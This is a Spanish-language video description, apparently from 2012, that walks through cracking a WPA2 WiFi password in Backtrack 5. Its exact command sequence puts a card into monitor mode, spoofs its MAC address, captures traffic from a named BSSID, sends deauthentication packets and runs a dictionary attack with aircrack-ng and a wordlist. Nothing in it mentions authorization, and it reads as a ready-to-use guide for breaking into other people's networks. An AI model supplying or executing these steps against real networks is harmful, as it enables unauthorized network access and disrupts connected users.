Backtrack 5 - Decodificando Passwords de Wifi (Olfateo y Diccionario) por Intruder-T23 HD

11.05.2012
Datos Basicos: Tipo de Ataque: diccionario. Clave Wifi a desencriptar: WPA2. Password del Wifi: administrator. Herramientas en el video: 1. Airmon-ng: Este programa se usa para poner la tarjeta wireless en modo monitor, de forma que uno puede capturar valores. 2. airodump-ng: Es un sniffer (olfateador) que captura el tráfico y lo coloca en archivos PCAP/IVS. 3. aireplay-ng: Este software se usa para inyectar paquetes, y funciona para generar aquel tráfico que será usado en aircrack-ng 4. aircrack-ng: Es una aplicación que usa un ataque de diccionario para decodificar passwords WEP y WPA. Archivo para ataque de diccionario: El archivo que contiene las claves para el ataque de diccionario se llama "darkc0de.lst" (o tiene un nombre similar a ese). En backtrack 5 este se encuentra en el directorio: "root/pentest/passwords/wordlists". Antes de hacer el video, este archivo se coloco en el directorio "root/Desktop". Al final del video, este archivo es usado por "aircrack-ng" para el ataque de diccionario. En caso de querer editarlo, se le hace doble click al archivo y se selecciona utilities, KWrite. Teclas en la terminal - Parte 1: A. airmon-ng B. airmon-ng start wlan0 C. airmon-ng D. ifconfig mon0 down E. macchanger -m 00:11:22:33:44:55 mon0 F. ifconfig mon0 up G. airodump-ng mon0 Descripción de comandos: A. Se teclea airmon-ng para ver la interface, la cual es wlan0. B. Se teclea airmon-ng start wlan0 para colocar la interface wlan0 en modo monitor. C. Tecleamos nuevamente airmon-ng y en la categoría de interface veremos mon0. D. Ponemos mon0 down por unos instantes. E. Cambiamos la dirección mac. F. Ponemos mon0 up. G. Usamos airodump-ng para ver los routers que hay en nuestra zona y capturar el tráfico. Teclas en la terminal - Parte 2: H. airodump-ng -c 6 -w WPACRACK10 --bssid 00:14:BF:E8:22:FB --ivs mon0 I. aireplay-ng -0 1 -e NET mon0 J. aircrack-ng -w /root/Desktop/0-darkc0de.lst WPACRACK10-01.ivs Descripción de comandos: H. Se teclea "-c 6" para especificar el número del canal del router que le queremos sacar el password. En el paso G, este aparece debajo "CH"... Se teclea "--bssid 00:14:BF:E8:22:FB" para especificar el BSSID del router. I. Se usa Aireplay-ng para inyectar paquetes y generar el tráfico que será usado en aircrack-ng. J. Se usa Aircrack-ng que es la aplicacion usada para el ataque de diccionario. En este se teclea "-w /root/Desktop/0-darkc0de.lst" para especificar el archivo que contiene los passwords (el archivo .lst) y "WPACRACK10-01.ivs" para seleccionar el archivo que contiene los paquetes capturados. Descarga del Video: http://www.filefactory.com/file/2sdf53i3k2yd/n/Pass_Wifi_by_Intruder-T23.mp4

Похожие видео